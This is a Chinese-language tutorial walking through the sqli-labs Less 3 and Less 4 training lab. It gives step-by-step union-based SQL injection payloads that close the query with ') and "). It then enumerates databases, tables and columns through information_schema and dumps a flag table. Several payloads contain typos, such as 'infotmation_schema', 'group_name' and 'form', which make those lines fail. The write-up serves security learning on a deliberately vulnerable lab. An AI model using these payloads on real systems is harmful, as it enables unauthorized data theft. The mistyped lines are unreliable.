sqli-labs sql注入靶场 less3、less4全网最详细,最全教程,每条命令都有详解

less3基于错误的GET单引号变形字符型注入

1、打开页面继续输入id=1查询,发现能够显示信息,继续查看寻找注入点,尝试输入?id=1'发现页面报错

ccf3ba39a0ec4df7d79e395dd0031ee2.png

2、根据报错判断,这里的sql查询语句为select * from users where id=('2')所以我们输入2’后就变成了id=('2'')这明显是错误的我们继续输入)闭合前面括号然后加上注释来注释掉后面的括号查看能否正常回显

3821f8f4022420441a80212cfb5ce022.png

 3、发现可以回显,继续构造语句来判断字段数?id=1') order by 3 --+发现可以正常返回,输入4的时候页面报错,判断只有三列

?id=1') order by 3 --+

0e10a2886e6aee25e20359238cddbe47.png

 4、继续构造语句判断回显位置?id=-1') union select 1,2,3--+查看到2,3位置可以回显

?id=-1') union select 1,2,3--+

f2feca551f575bfe27bfaf27ff888ef3.png

 5、继续构造语句来查看当前数据库的用户和当前库名

?id=-1') union select 1,user(),database()--+

cddcc7aef4d4c97c670e30177b08bc76.png

 6、查看到了当前数据库的用户名和库后,继续使用mysql的系统库来查看当前mysql的所有数据库

?id=-1')union select 1,2,group_concat(schema_name)from information_schema.schemata

9b309575ece0d8f9be21c9ef86780625.png

 7、看到flag库,继续构造语句查看flag库内的表名

?id=-1')union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=0x666c6167

29f007ae0748fd2d2f7c3712af1e4078.png

 8、看到了flag数据库下有一个flagtable表,继续构造语句查看flagtable表内的字段名

?id=-1')union select 1,2,group_concat(column_name)from infotmation_schema.columns where table_name=0x666c61677461626c65--+

382f00321a3e63f7cbb574e691515b98.png

 9、看到表中有两个字段,一个是id一个是flag,继续构造语句拿出数据

?id=-1')union select 1,2,group_concat(id,0x3A,flag)from flag.flagtable--+

1b9cbb092bb7dce9fa1932fd506cdf7f.png

 less4基于错误的GET双引号字符型注入

1、打开靶场先判断注入类型,输入id=1')and 1=2 --+发现页面依然有正确回显,输入双引号的时候页面无回显,所以判断要使用双引号闭合语句

f801d88c128691e8d9dc9ce7fa5b64ca.png

 2、还是构造语句判断有几列?id=1")order by 3 --+有显示,4的时候报错,所以判断只有三列

?id=1")order by 3 --+

ff6e614e41ed29470588082f1a7cb7c3.png

 3、然后判断回显位置,构造语句,看到2、3位置有回显

?id=-1")union select 1,2,3 --+

39e6caf49f08d1c67d918f254188dd73.png

 4、查看数据库基本信息

?id=-1")union select 1,user(),database() --+

6b7dc789e724ccb09fb5457199d56110.png

 5、继续使用mysql的系统库查看当前mysql下所有数据库的名字

?id=-1")union select 1,2,group_concat(schema_name)from information_schema.schemata --+

8254f67d9845510f705d6e5770033d31.png

6、继续查看flag库下的表名

?id=-1")union select 1,2,group_name(table_name)from information.tables where table_schema=0x666c6167--+

967f66263bd4139ba1817e95e388fe3c.png

 7、看到flagtable表,继续构造语句查看表中的字段

?id=-1")union select 1,2,group_concat(column_name)from information_schema.columns where table_name=0x666c61677461626c65--+

3afa3a58df3f5c3518b9963d787360db.png

 8、看到有两个字段,继续构造语句拿到这两个字段的内容

?id=-1")union select 1,2,group_concat(id,0x3A,flag)form flag.flagtable--+

 

74098f2cf9583e9e8116a5a87e074106.png

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值